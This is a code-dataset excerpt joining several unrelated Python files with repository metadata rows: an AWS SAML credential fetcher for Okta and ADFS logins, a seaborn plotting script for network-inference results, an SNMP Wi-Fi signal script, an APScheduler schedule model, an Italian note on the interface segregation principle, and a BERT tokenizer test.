* Make a GET request to ``saml_endpoint``
* Parse the HTML to look for an HTML form
* Fill in the form data with the username, password
* Make a POST request to the URL indicated by the form
action with the filled in form data.
* Parse the HTML returned from the service and
extract out the SAMLAssertion.
:param password_prompter: A function that takes a prompt string and
returns a password string.
:param requests_session: A requests session object used to make
requests to the saml provider.
"""
if requests_session is None:
requests_session = requests.Session()
self._requests_session = requests_session
self._password_prompter = password_prompter
def is_suitable(self, config):
return config.get('saml_authentication_type') == 'form'
def retrieve_saml_assertion(self, config):
"""Retrive SAML assertion using form based auth.
This is a generic form based authenticator that will
make an HTTP request to retrieve an HTML form, fill in the
form fields with username/password, and submit the form.
:type config: dict
:param config: The config associated with the profile. Contains:
* saml_endpoint
* saml_username
:raises SAMLError: Raised when we are unable to retrieve a
SAML assertion.
:rtype: str
:return: The base64 encoded SAML assertion if the login process
was successful.
"""
# precondition: self.is_suitable() returns true.
# We still need other values in the config dict to work
# properly, so we have to validate config params before
# going any further.
self._validate_config_values(config)
endpoint = config['saml_endpoint']
login_url, form_data = self._retrieve_login_form_from_endpoint(
endpoint)
self._fill_in_form_values(config, form_data)
response = self._send_form_post(login_url, form_data)
return self._extract_saml_assertion_from_response(response)
def _validate_config_values(self, config):
for required in ['saml_endpoint', 'saml_username']:
if required not in config:
raise SAMLError(self._ERROR_MISSING_CONFIG % required)
def _retrieve_login_form_from_endpoint(self, endpoint):
response = self._requests_session.get(endpoint, verify=True)
self._assert_non_error_response(response)
login_form_html_node = self._parse_form_from_html(response.text)
if login_form_html_node is None:
raise SAMLError(self._ERROR_NO_FORM % endpoint)
form_action = urljoin(endpoint,
login_form_html_node.attrib.get('action', ''))
if not form_action.lower().startswith('https://'):
raise SAMLError('Your SAML IdP must use HTTPS connection')
payload = dict((tag.attrib['name'], tag.attrib.get('value', ''))
for tag in login_form_html_node.findall(".//input"))
return form_action, payload
def _assert_non_error_response(self, response):
if response.status_code != 200:
raise SAMLError(
self._ERROR_BAD_RESPONSE % (response.status_code,
response.url))
def _parse_form_from_html(self, html):
# Scrape a form from html page, and return it as an elementtree element
parser = FormParser()
parser.feed(html)
if parser.forms:
return ET.fromstring(parser.extract_form(0))
def _fill_in_form_values(self, config, form_data):
username = config['saml_username']
username_field = set(self.USERNAME_FIELDS).intersection(
form_data.keys()
)
if not username_field:
raise SAMLError(
self._ERROR_MISSING_FORM_FIELD % self.USERNAME_FIELDS)
form_data[username_field.pop()] = username
password_field = set(self.PASSWORD_FIELDS).intersection(
form_data.keys()
)
if password_field:
form_data[password_field.pop()] = self._password_prompter(
"Password: ")
def _send_form_post(self, login_url, form_data):
response = self._requests_session.post(
login_url, data=form_data, verify=True
)
if response.status_code != 200:
raise SAMLError(self._ERROR_LOGIN_FAILED_NON_200 %
response.status_code)
return response.text
def _extract_saml_assertion_from_response(self, response_body):
parsed = self._parse_form_from_html(response_body)
if parsed is not None:
assertion = self._get_value_of_first_tag(
parsed, 'input', 'name', 'SAMLResponse')
if assertion is not None:
return assertion
# We can reach here in two cases.
# First, we were able to login but for some reason we can't find the
# SAMLResponse in the response body. The second (and more likely)
# reason is that the login has failed. For example, if you provide an
# invalid password when trying to login, many IdPs will return a 200
# status code and return HTML content that indicates an error occurred.
# This is the error we'll present to the user.
raise SAMLError(self._ERROR_LOGIN_FAILED)
def _get_value_of_first_tag(self, root, tag, attr, trait):
for element in root.findall(tag):
if element.attrib.get(attr) == trait:
return element.attrib.get('value')
class OktaAuthenticator(GenericFormsBasedAuthenticator):
_AUTH_URL = '/api/v1/authn'
def retrieve_saml_assertion(self, config):
self._validate_config_values(config)
endpoint = config['saml_endpoint']
hostname = urlsplit(endpoint).netloc
auth_url = 'https://%s/api/v1/authn' % hostname
username = config['saml_username']
password = self._password_prompter("Password: ")
logger.info(
'Sending HTTP POST with username (%s) and password to Okta API '
'endpoint: %s', username, auth_url
)
response = self._requests_session.post(
auth_url,
headers={'Content-Type': 'application/json',
'Accept': 'application/json'},
data=json.dumps({'username': username,
'password': password})
)
parsed = json.loads(response.text)
session_token = parsed['sessionToken']
saml_url = endpoint + '?sessionToken=%s' % session_token
response = self._requests_session.get(saml_url)
logger.info(
'Received HTTP response of status code: %s', response.status_code)
r = self._extract_saml_assertion_from_response(response.text)
logger.info(
'Received the following SAML assertion: \n%s', r,
extra={'is_saml_assertion': True}
)
return r
def is_suitable(self, config):
return (
config.get('saml_authentication_type') == 'form'
and config.get('saml_provider') == 'okta'
)
class ADFSFormsBasedAuthenticator(GenericFormsBasedAuthenticator):
USERNAME_FIELDS = (
'ctl00$ContentPlaceHolder1$UsernameTextBox',
'UserName',
)
PASSWORD_FIELDS = (
'ctl00$ContentPlaceHolder1$PasswordTextBox',
'Password',
)
def is_suitable(self, config):
return (
config.get('saml_authentication_type') == 'form'
and config.get('saml_provider') == 'adfs'
)
class FormParser(six.moves.html_parser.HTMLParser):
def __init__(self):
"""Parse an html saml login form."""
six.moves.html_parser.HTMLParser.__init__(self)
self.forms = []
self._current_form = None
def handle_starttag(self, tag, attrs):
if tag == 'form':
self._current_form = dict(attrs)
if tag == 'input' and self._current_form is not None:
self._current_form.setdefault('_fields', []).append(dict(attrs))
def handle_endtag(self, tag):
if tag == 'form' and self._current_form is not None:
self.forms.append(self._current_form)
self._current_form = None
def _dict2str(self, d):
# When input contains things like "&", HTMLParser will unescape it.
# But we need to use escape() here to nullify the default behavior,
# so that the output will be suitable to be fed into an ET later.
parts = []
for k, v in d.items():
escaped_value = escape(v) # pylint: disable=deprecated-method
parts.append('%s="%s"' % (k, escaped_value))
return ' '.join(sorted(parts))
def extract_form(self, index):
form = dict(self.forms[index]) # Will raise exception if out of bound
fields = form.pop('_fields', [])
return '<form %s>%s</form>' % (
self._dict2str(form),
''.join('<input %s/>' % self._dict2str(f) for f in fields))
def error(self, message):
# ParserBase, the parent of HTMLParser, defines this abstract method
# instead of just raising an exception for some silly reason,
# so we have to implement it.
raise FormParserError(message)
class SAMLCredentialFetcher(CachedCredentialFetcher):
SAML_FORM_AUTHENTICATORS = {
'okta': OktaAuthenticator,
'adfs': ADFSFormsBasedAuthenticator
}
def __init__(self, client_creator, provider_name, saml_config,
role_selector=_role_selector,
password_prompter=getpass.getpass, cache=None,
expiry_window_seconds=60 * 15):
"""Credential fetcher for SAML."""
self._client_creator = client_creator
self._role_selector = role_selector
self._config = saml_config
self._provider_name = provider_name
authenticator_cls = self.SAML_FORM_AUTHENTICATORS.get(provider_name)
if authenticator_cls is None:
raise ValueError('Unsupported SAML provider: %s' % provider_name)
self._authenticator = authenticator_cls(password_prompter)
self._assume_role_kwargs = None
if cache is None:
cache = {}
self._cache = cache
self._stored_cache_key = None
self._expiry_window_seconds = expiry_window_seconds
@property
def _cache_key(self):
if self._stored_cache_key is None:
self._stored_cache_key = self._create_cache_key()
return self._stored_cache_key
def _create_cache_key(self):
cache_key_kwargs = {
'provider_name': self._provider_name,
'saml_config': self._config.copy()
}
cache_key_kwargs = json.dumps(cache_key_kwargs, sort_keys=True)
argument_hash = sha1(cache_key_kwargs.encode('utf-8')).hexdigest()
return self._make_file_safe(argument_hash)
def fetch_credentials(self):
creds = super(SAMLCredentialFetcher, self).fetch_credentials()
return {
'AccessKeyId': creds['access_key'],
'SecretAccessKey': creds['secret_key'],
'SessionToken': creds['token'],
'Expiration': creds['expiry_time']
}
def _get_credentials(self):
kwargs = self._get_assume_role_kwargs()
client = self._create_client()
logger.info(
'Retrieving credentials with STS.AssumeRoleWithSaml() using the '
'following parameters: %s', kwargs
)
response = deepcopy(client.assume_role_with_saml(**kwargs))
expiration = response['Credentials']['Expiration'].isoformat()
response['Credentials']['Expiration'] = expiration
return response
def _create_client(self):
return self._client_creator(
'sts', config=Config(
signature_version=botocore.UNSIGNED,
user_agent_extra=(
'awsprocesscreds-saml/%s' % awsprocesscreds.__version__
)
)
)
def _get_role_and_principal_arn(self, assertion):
idp_roles = self._parse_roles(assertion)
role_arn = self._role_selector(self._config.get('role_arn'), idp_roles)
if not role_arn:
role_arns = [r['RoleArn'] for r in idp_roles]
raise SAMLError('Unable to choose role "%s" from %s' % (
self._config.get('role_arn'), role_arns
))
return role_arn
def _get_assume_role_kwargs(self):
if self._assume_role_kwargs is not None:
return self._assume_role_kwargs
config = self._config.copy()
config['saml_provider'] = self._provider_name
if not self._authenticator.is_suitable(config):
raise ValueError('Invalid config')
assertion = self._authenticator.retrieve_saml_assertion(config)
if not assertion:
raise SAMLError(
'Failed to login at %s' % config['saml_endpoint'])
arns = self._get_role_and_principal_arn(assertion)
self._assume_role_kwargs = {
'PrincipalArn': arns['PrincipalArn'],
'RoleArn': arns['RoleArn'],
'SAMLAssertion': assertion
}
return self._assume_role_kwargs
def _parse_roles(self, assertion):
attribute = '{urn:oasis:names:tc:SAML:2.0:assertion}Attribute'
attr_value = '{urn:oasis:names:tc:SAML:2.0:assertion}AttributeValue'
awsroles = []
root = ET.fromstring(base64.b64decode(assertion).decode('ascii'))
for attr in root.iter(attribute):
if attr.get('Name') == \
'https://aws.amazon.com/SAML/Attributes/Role':
for value in attr.iter(attr_value):
parts = [p.strip() for p in value.text.split(',')]
# Deals with "role_arn,pricipal_arn" or its reversed order
if 'saml-provider' in parts[0]:
role = {'PrincipalArn': parts[0], 'RoleArn': parts[1]}
else:
role = {'PrincipalArn': parts[1], 'RoleArn': parts[0]}
awsroles.append(role)
return awsroles
| 37.748889
| 79
| 0.631836
|
4a05002fb928d0a7eaf5041205098776902f546d
| 8,903
|
py
|
Python
|
scripts/timeseries_sampling/plot_boxes_timeseries_scans_finest_sampling.py
|
jiawu/Roller
|
a70e350905a59c2254dcefda7ab23c6417cf8f7d
|
[
"MIT"
] | null | null | null |
scripts/timeseries_sampling/plot_boxes_timeseries_scans_finest_sampling.py
|
jiawu/Roller
|
a70e350905a59c2254dcefda7ab23c6417cf8f7d
|
[
"MIT"
] | 2
|
2015-07-13T18:51:22.000Z
|
2015-07-16T15:35:24.000Z
|
scripts/timeseries_sampling/plot_boxes_timeseries_scans_finest_sampling.py
|
jiawu/Roller
|
a70e350905a59c2254dcefda7ab23c6417cf8f7d
|
[
"MIT"
] | null | null | null |
import matplotlib
matplotlib.use('Agg')
from Swing.util.BoxPlot import BoxPlot
from matplotlib.backends.backend_pdf import PdfPages
from scipy import stats
import pdb
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import sys
import os
import time
from Swing.util.mplstyle import style1
import seaborn as sns
from palettable.colorbrewer.qualitative import Set1_3
def get_df(df, sampling_rate, network, min_lag, max_lag, td_window, inftype = "RandomForest"):
new_df = df[(df['network_number'] == network) & (df['sampling_rate'] == sampling_rate) & (df['min_lag'] == min_lag) & (df['max_lag'] == max_lag) & (df['td_window'] == float(td_window)) & (df['InfType'] == inftype)]
return(new_df)
def load_data():
input_folder_list = ["/projects/p20519/roller_output/high_sampling/RandomForest/"]
agg_df_RF = read_tdr_results(input_folder_list, folder_str = "2017-09")
agg_df_RF['InfType'] = 'RandomForest'
input_folder_list = ["/projects/p20519/roller_output/high_sampling/Dionesus/"]
agg_df_P = read_tdr_results(input_folder_list, folder_str = "2017-09")
agg_df_P['InfType'] = 'PLSR'
input_folder_list = ["/projects/p20519/roller_output/high_sampling/Lasso/"]
agg_df_L = read_tdr_results(input_folder_list, folder_str = "2017-09")
agg_df_L['InfType'] = 'Lasso'
all_dfs = [agg_df_RF, agg_df_P, agg_df_L]
merged_df = pd.concat(all_dfs)
return(merged_df)
def read_tdr_results(folder_list, folder_str):
agg_df = pd.DataFrame()
for input_folder in folder_list:
for file_path in os.listdir(input_folder):
if folder_str in file_path:
try:
df = pd.read_csv(input_folder+file_path,sep='\t', engine='python')
except pd.io.common.EmptyDataError:
continue
# check if the columns are misaligned.
if type(df['permutation_n'].iloc[0]) is str:
new_col = df.columns.tolist()
new_col.pop(0)
new_df = df.iloc[:,0:len(df.iloc[0])-1]
new_df.columns = new_col
df=new_df
agg_df = agg_df.append(df)
return(agg_df)
def get_inf_df(network_1, inf_type):
RFnet1 = network_1[network_1['InfType'] == inf_type]
RFn1 = RFnet1.groupby('sampling_rate').mean()
return(RFn1)
def get_comparisons(merged_df, inftypes, sampling_rates, network_list):
# 10 - 101, 67
# 30 - 34, 22
# 50 - 21, 14
# 100 - 11, 7
# 200 - 6, 4
# 333 - 4, 3
# 500 - 3, 2
max_window_dict = { '10':101,
'30':34,
'50':21,
'100':11,
'200':6,
'333':4,
'500':3}
td_window_dict = { '10':67,
'30':22,
'50':14,
'100':7,
'200':4,
'333':2,
'500':2}
all_networks = merged_df['network_number'].dropna().unique()
all_sampling_rates = merged_df['sampling_rate'].dropna().unique()
overall_df = pd.DataFrame()
network_1_df = pd.DataFrame()
for inftype in inftypes:
for sampling_rate in all_sampling_rates:
for network in all_networks:
baseline = get_df(merged_df, sampling_rate, network, 0, 0, max_window_dict[sampling_rate], inftype = inftype)
if len(baseline) == 0:
continue
td_window = td_window_dict[sampling_rate]
min_lag = 1
max_lag = 3
max_window = max_window_dict[sampling_rate]
if max_window - td_window < 3:
max_lag = max_window - td_window
if min_lag > max_lag:
min_lag = max_lag
comparisons = get_df(merged_df, sampling_rate, network, min_lag, max_lag, td_window, inftype = inftype)
if len(comparisons) == 0:
continue
# for each statistic, get the percent difference to the baseline comparison.
stat = 'aupr'
baseline_mean=baseline[stat].mean()
comparisons['percent_{}'.format(stat)] = ((comparisons[stat]-baseline_mean)/baseline_mean)*100
stat = 'auroc'
baseline_mean=baseline[stat].mean()
comparisons['percent_{}'.format(stat)] = ((comparisons[stat]-baseline_mean)/baseline_mean)*100
overall_df = overall_df.append(comparisons.iloc[0:100,:], ignore_index = True)
if network == all_networks[6]:
network_1_df = network_1_df.append(comparisons.iloc[0:100,:], ignore_index = True)
print(sampling_rate, network, len(baseline),len(comparisons), inftype)
return(overall_df, network_1_df)
test_statistic = ['aupr', 'auroc']
save_tag = "window_scan"
n_trials = 100
#merged_df = load_data()
#merged_df.to_pickle("merged_sampling_scan.pkl")
#merged_df = pd.read_pickle("merged_sampling_scan.pkl")
#network_list = merged_df['file_path'].unique().tolist()
#network_list = [x for x in network_list if 'even' not in str(x)]
#merged_df['network_number'] = merged_df['file_path'].str.extract('((Ecoli|Yeast)-[0-9]{1,2})_[\d]+_timeseries')[0]
#merged_df['sampling_rate'] = merged_df['file_path'].str.extract('-[0-9]{1,2}_(\d+)_timeseries')
# baseline is the full size window. The full size windows are:
#
# parse the dataframe:
# sampling period
# base_network
# filter data
window_sizes = range(2,22)
inftypes = ['RandomForest', 'Lasso', 'PLSR']
sampling_rates = [10]
overall_df, network_1 = get_comparisons(merged_df, inftypes, sampling_rates, network_list)
overall_df.to_pickle("merged_sampling_comparisons_finest.pkl")
network_1.to_pickle("merged_sampling_comparisons_network1_finest.pkl")
#overall_df = pd.read_pickle("merged_sampling_comparisons_finest.pkl")
#network_1 = pd.read_pickle("merged_sampling_comparisons_network1_finest.pkl")
stat = 'percent_aupr'
pdb.set_trace()
meanpointprops = dict(marker = 'o', markeredgecolor='black', markerfacecolor='white', markeredgewidth = 1, markersize = 10)
medianprops = dict(color='black', linewidth=1.5)
g = sns.FacetGrid(overall_df, col = "InfType", size = 12, aspect=0.6)
g = g.map(sns.boxplot, 'sampling_rate', 'percent_aupr', showfliers = False, order = ['10','30','50','100','200','333','500'],color = 'cornflowerblue', showmeans=True, meanprops = meanpointprops, medianprops=medianprops)
g.set(ylim=(-60, 200))
g.set(xlabel="Sampling Rate")
g.fig.get_axes()[0].set_ylabel("% change AUPR")
g.fig.get_axes()[0].axhline(y = 0, c = "darkgrey")
g.fig.get_axes()[1].axhline(y = 0, c = "darkgrey")
g.fig.get_axes()[2].axhline(y = 0, c = "darkgrey")
## Plot the AUPR for 1 graph, dionesus
index = ['10', '30', '50', '100', '200','333', '500']
RFn1 = get_inf_df(network_1, inf_type = 'RandomForest')
net1color = 'firebrick'
g.fig.get_axes()[0].plot(RFn1.loc[index, stat], marker='.', color = net1color)
Ln1 = get_inf_df(network_1, inf_type = 'Lasso')
g.fig.get_axes()[1].plot(Ln1.loc[index, stat], marker='.', color = net1color)
Pn1 = get_inf_df(network_1, inf_type = 'PLSR')
g.fig.get_axes()[2].plot(Pn1.loc[index,stat], marker='.', color = net1color)
#for axes in g.axes.flat:
# axes.set_xticklabels(['{:d}'.format(x) for x in axes.get_xticks()])
g.savefig('combined_10_AUPR_sampling_heat_map.pdf')
pdb.set_trace()
## Plot AUROC
stat = 'percent_auroc'
meanpointprops = dict(marker = 'o', markeredgecolor='black', markerfacecolor='white', markeredgewidth = 1, markersize = 10)
medianprops = dict(color='black', linewidth=1.5)
g = sns.FacetGrid(overall_df, col = "InfType", size = 12, aspect=0.6)
g = g.map(sns.boxplot, 'sampling_rate', 'percent_auroc', order=['10','30','50','100','200','333','500'], showfliers = False, color = 'darkorange', showmeans=True, meanprops = meanpointprops, medianprops=medianprops)
g.set(ylim=(-50, 60))
g.set(xlabel="Sampling Rate")
g.fig.get_axes()[0].set_ylabel("% change AUROC")
g.fig.get_axes()[0].axhline(y = 0, c = "darkgrey")
g.fig.get_axes()[1].axhline(y = 0, c = "darkgrey")
g.fig.get_axes()[2].axhline(y = 0, c = "darkgrey")
## Plot the AUROC for 1 graph, all inf methods
RFn1 = get_inf_df(network_1, inf_type = 'RandomForest')
net1color = 'firebrick'
g.fig.get_axes()[0].plot(RFn1[stat].values, marker='.', color = net1color)
Ln1 = get_inf_df(network_1, inf_type = 'Lasso')
g.fig.get_axes()[1].plot(Ln1[stat].values, marker='.', color = net1color)
Pn1 = get_inf_df(network_1, inf_type = 'PLSR')
g.fig.get_axes()[2].plot(Pn1[stat].values, marker='.', color = net1color)
#for axes in g.axes.flat:
# axes.set_xticklabels(['{:d}'.format(x) for x in axes.get_xticks()])
g.savefig('combined_10_AUROC_sampling_heatmap.pdf')
| 40.652968
| 219
| 0.640009
|
4a05008e9e7e6f446ddc73250f9ef3c9566eb1f6
| 2,199
|
py
|
Python
|
snmp_fabfile.py
|
edwinsteele/python-scripts
|
b2ed85df202f5e58ed178b00100357bde1002010
|
[
"CC0-1.0"
] | 2
|
2015-10-05T04:20:52.000Z
|
2016-04-08T10:31:21.000Z
|
snmp_fabfile.py
|
edwinsteele/python-scripts
|
b2ed85df202f5e58ed178b00100357bde1002010
|
[
"CC0-1.0"
] | null | null | null |
snmp_fabfile.py
|
edwinsteele/python-scripts
|
b2ed85df202f5e58ed178b00100357bde1002010
|
[
"CC0-1.0"
] | null | null | null |
import os
from fabric.api import env, local, parallel, task
from fabric.context_managers import cd, hide, quiet, warn_only
import fabric.colors
from hnmp import SNMP, SNMPError
import time
ACCESS_POINTS = ["ap-kitchen", "ap-bedroom"]
def retry_until_true(delay_secs=1):
"""Mostly pinched from https://wiki.python.org/moin/PythonDecoratorLibrary"""
def dec(func):
def f2(*args, **kwargs):
rv = func(*args, **kwargs)
while not rv:
print(args[0]("retrying"))
time.sleep(delay_secs)
rv = func(*args, **kwargs)
return rv
return f2
return dec
def do_stuff():
print "do_stuff for %s" % (env.host_string,)
@retry_until_true(delay_secs=5)
def get_mac(c):
with quiet():
# Give the ARP cache a chance to be populated
ping()
result = local("arp %s" % (env.host_string,), capture=True)
if "incomplete" in result.stdout or \
"no entry" in result.stdout:
return None
elif "Unknown host" in result.stderr:
return None
else:
return result.stdout.split(" ")[3]
def ping():
local("ping -q -t 2 -c 1 %s" % (env.host_string,))
def get_print_colour():
all_colours = ("blue", "green", "magenta", "red", "yellow", "cyan")
return getattr(fabric.colors, all_colours[env.hosts.index(env.host_string)])
# return all_colours[]
def mac_to_snmp_string(mac_addr):
return ".".join([str(ord(i.upper())) for i in mac_addr])
def get_signal_strength(ap, mac_addr):
BASE_OID = "1.3.6.1.4.1.63.501.3.2.2.1.6.17."
try:
snmp = SNMP(ap)
oid = BASE_OID + mac_to_snmp_string(mac_addr)
signal_strength = snmp.get(oid)
except SNMPError:
signal_strength = None
return signal_strength
@task
def meta():
colour = get_print_colour()
mac = get_mac(colour)
print(colour("MAC (%s) is %s" % (env.host_string, mac,)))
while True:
for access_point in ACCESS_POINTS:
print(colour("%s signal strength: %s db" %
(access_point,
get_signal_strength(access_point, mac))))
time.sleep(5)
| 26.493976
| 81
| 0.607094
|
4a05010a7cfe77def2bee2b85c7f513d7675891c
| 3,877
|
py
|
Python
|
raphael/app/modules/schedule/models.py
|
major1201/raphael
|
18d7060834be7645b66144ba2a1638f3e1db2dd2
|
[
"MIT"
] | null | null | null |
raphael/app/modules/schedule/models.py
|
major1201/raphael
|
18d7060834be7645b66144ba2a1638f3e1db2dd2
|
[
"MIT"
] | null | null | null |
raphael/app/modules/schedule/models.py
|
major1201/raphael
|
18d7060834be7645b66144ba2a1638f3e1db2dd2
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
from __future__ import division, absolute_import, with_statement, print_function
import json
from apscheduler.jobstores.base import JobLookupError
from raphael.utils.dao.context import DBContext
from raphael.utils import num, strings, time, task, logger
TASK_DATABASE = 'database'
def get_schedule(oid):
ctx = DBContext()
return ctx.get('cm_schedule', oid)
def save_task_schedule(o):
if strings.is_blank(o.get('id', None)):
raise ValueError('Field "id" not in this object: ' + str(o))
if o['enabled']:
# prepare args & kwargs
args = None
kwargs = None
try:
args_kwargs = json.loads(o['args'])
args = args_kwargs['args']
kwargs = args_kwargs['kwargs']
except:
pass
# add
if o['type'] == 1: # date
task.add_date_job(o['func'], o['id'], TASK_DATABASE, args=args, kwargs=kwargs, run_date=time.string_to_date(o['data'], '%Y-%m-%d %H:%M:%S'), timezone='utc')
elif o['type'] == 2: # interval
interval = json.loads(o['data'])
task.add_interval_job(o['func'], o['id'], TASK_DATABASE, args=args, kwargs=kwargs, weeks=num.safe_int(interval['weeks']), days=num.safe_int(interval['days']),
hours=num.safe_int(interval['hours']), minutes=num.safe_int(interval['minutes']), seconds=num.safe_int(interval['seconds']),
start_date=o['starttime'], end_date=o['endtime'], timezone='utc')
elif o['type'] == 3: # cron
cron = json.loads(o['data'])
task.add_cron_job(o['func'], o['id'], TASK_DATABASE, args=args, kwargs=kwargs, year=cron['year'], month=cron['month'], day=cron['day'],
day_of_week=cron['day_of_week'], hour=cron['hour'], minute=cron['minute'], second=cron['second'],
start_date=o['starttime'], end_date=o['endtime'], timezone='utc')
else:
try:
task.remove_job(o['id'], TASK_DATABASE)
except JobLookupError:
pass
def save_schedule(o):
with DBContext() as ctx:
ctx.save('cm_schedule', o)
def save_schedule_manually(o):
with DBContext():
save_schedule(o)
save_task_schedule(o)
def delete_schedule(oid):
with DBContext() as ctx:
ctx.delete_byid('cm_schedule', oid)
ctx.execute_delete('cm_schedule_log', 'scheduleid = :sid', sid=oid)
try:
task.remove_job(oid, TASK_DATABASE)
except JobLookupError:
logger.error_traceback()
def find_schedules(**params):
ctx = DBContext()
sql = ['1=1']
cond = {}
if 'enabled' in params:
sql.append('and enabled = :enabled')
cond['enabled'] = params['enabled']
if 'type' in params:
sql.append('and type = :type')
cond['type'] = params['type']
if 'module' in params:
sql.append('and module = :module')
cond['module'] = params['module']
if 'modulelike' in params:
sql.append('and module like :modulelike')
cond['modulelike'] = '%' + params['modulelike'] + '%'
if 'sourceid' in params:
sql.append('and sourceid = :sourceid')
cond['sourceid'] = params['sourceid']
return ctx.create_query('cm_schedule', ' '.join(sql), **cond)
# schedule_log
def save_schedule_log(o):
ctx = DBContext()
ctx.save('cm_schedule_log', o)
def find_schedule_logs(**params):
sql = ['1=1']
cond = {}
ctx = DBContext()
if 'scheduleid' in params:
sql.append('and scheduleid = :scheduleid')
cond['scheduleid'] = params['scheduleid']
if 'status' in params:
sql.append('and status = :status')
cond['status'] = num.safe_int(params['status'])
return ctx.create_query('cm_schedule_log', ' '.join(sql), **cond)
| 35.245455
| 170
| 0.593242
|
4a0502d78ce2411de6a34f48157e656757a53ccf
| 1,232
|
py
|
Python
|
day-04/part-2/ludoge.py
|
badouralix/adventofcode-2018
|
543ce39d4eeb7d9d695459ffadca001a8c56386d
|
[
"MIT"
] | 31
|
2018-12-01T00:43:40.000Z
|
2020-05-30T05:18:59.000Z
|
day-04/part-2/ludoge.py
|
badouralix/adventofcode-2018
|
543ce39d4eeb7d9d695459ffadca001a8c56386d
|
[
"MIT"
] | 14
|
2018-12-01T12:14:26.000Z
|
2021-05-07T22:41:47.000Z
|
day-04/part-2/ludoge.py
|
badouralix/adventofcode-2018
|
543ce39d4eeb7d9d695459ffadca001a8c56386d
|
[
"MIT"
] | 10
|
2018-12-01T23:38:34.000Z
|
2020-12-28T13:36:10.000Z
|
from tool.runners.python import SubmissionPy
from collections import Counter
class LudogeSubmission(SubmissionPy):
def run(self, s):
# :param s: input in string format
# :return: solution flag
# Your code goes here
lines = sorted(s.splitlines())
guards = {}
for line in lines:
minute = int(line.split()[1][3:5])
if "#" in line:
guard_id = int(line.split()[3][1:])
if guard_id not in guards:
guards[guard_id] = []
wakes_up = minute
if "falls asleep" in line:
falls_asleep = minute
if "wakes up" in line:
wakes_up = minute
guards[guard_id] += list(range(falls_asleep, wakes_up))
guard_minute_frequency = {k: dict(Counter(v)) for k, v in guards.items() if Counter(v)}
guard_minute_max = {k: max(v.values()) for k, v in guard_minute_frequency.items()}
max_guard = max(guard_minute_frequency, key=guard_minute_max.get)
max_guard_sleeps = guards[max_guard]
max_minute = max(set(max_guard_sleeps), key=max_guard_sleeps.count)
return max_minute * max_guard
pass
| 35.2
| 95
| 0.581981
|
4a050397033246bf229246395dd2ba79c96bb089
| 1,484
|
py
|
Python
|
SOLID/es2/isp_step2.py
|
nick87ds/MaterialeSerate
|
51627e47ff1d3c3ecfc9ce6741c04b91b3295359
|
[
"MIT"
] | 12
|
2021-12-12T22:19:52.000Z
|
2022-03-18T11:45:17.000Z
|
SOLID/es2/isp_step2.py
|
nick87ds/MaterialeSerate
|
51627e47ff1d3c3ecfc9ce6741c04b91b3295359
|
[
"MIT"
] | 1
|
2022-03-23T13:58:33.000Z
|
2022-03-23T14:05:08.000Z
|
SOLID/es2/isp_step2.py
|
nick87ds/MaterialeSerate
|
51627e47ff1d3c3ecfc9ce6741c04b91b3295359
|
[
"MIT"
] | 7
|
2021-02-01T22:09:14.000Z
|
2021-06-22T08:30:16.000Z
|
"""
E se aggiungiamo un altro metodo all'interfaccia IShape, come draw_triangle()?
"""
class IShape:
def draw_square(self):
raise NotImplementedError
def draw_rectangle(self):
raise NotImplementedError
def draw_circle(self):
raise NotImplementedError
def draw_triangle(self):
raise NotImplementedError
"""
Le classi devono implementare il nuovo metodo o verrà generato un errore.
Vediamo che è impossibile implementare una forma che possa disegnare un
cerchio ma non un rettangolo o un quadrato o un triangolo.
Possiamo solo implementare i metodi generando un errore che mostra
che l'operazione non può essere eseguita.
L'ISP disapprova il design di questa interfaccia IShape.
I clients (qui Rectangle, Circle e Square) non dovrebbero essere costretti
a dipendere da metodi di cui non hanno bisogno o di cui non fanno uso.
Inoltre, l'ISP afferma che le interfacce dovrebbero eseguire un solo lavoro
(come il principio SRP) ogni ulteriore raggruppamento di comportamenti
dovrebbe essere rimosso e assegnato ad un'altra interfaccia.
Qui, la nostra interfaccia IShape esegue azioni che dovrebbero essere gestite
in modo indipendente da altre interfacce.
Per rendere la nostra interfaccia IShape conforme al principio ISP, segreghiamo
le azioni su diverse interfacce.
Le classi (cerchio, rettangolo, quadrato, triangolo, ecc.) possono
semplicemente ereditare dall'interfaccia IShape e implementare il proprio
comportamento.
"""
| 32.977778
| 79
| 0.789084
|
4a0503c3ed6999e3bd81aec4de8f7d64ec733bd9
| 5,406
|
py
|
Python
|
official/nlp/bert/tokenization_test.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 153
|
2020-10-25T13:58:04.000Z
|
2022-03-07T06:01:54.000Z
|
official/nlp/bert/tokenization_test.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 11
|
2020-07-13T08:29:00.000Z
|
2022-03-24T07:21:09.000Z
|
official/nlp/bert/tokenization_test.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 23
|
2020-10-25T14:44:47.000Z
|
2021-03-31T02:12:13.000Z
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import six
import tensorflow as tf
from official.nlp.bert import tokenization
class TokenizationTest(tf.test.TestCase):
"""Tokenization test.
The implementation is forked from
https://github.com/google-research/bert/blob/master/tokenization_test.py."
"""
def test_full_tokenizer(self):
vocab_tokens = [
"[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn",
"##ing", ","
]
with tempfile.NamedTemporaryFile(delete=False) as vocab_writer:
if six.PY2:
vocab_writer.write("".join([x + "\n" for x in vocab_tokens]))
else:
vocab_writer.write("".join([x + "\n" for x in vocab_tokens
]).encode("utf-8"))
vocab_file = vocab_writer.name
tokenizer = tokenization.FullTokenizer(vocab_file)
os.unlink(vocab_file)
tokens = tokenizer.tokenize(u"UNwant\u00E9d,running")
self.assertAllEqual(tokens, ["un", "##want", "##ed", ",", "runn", "##ing"])
self.assertAllEqual(
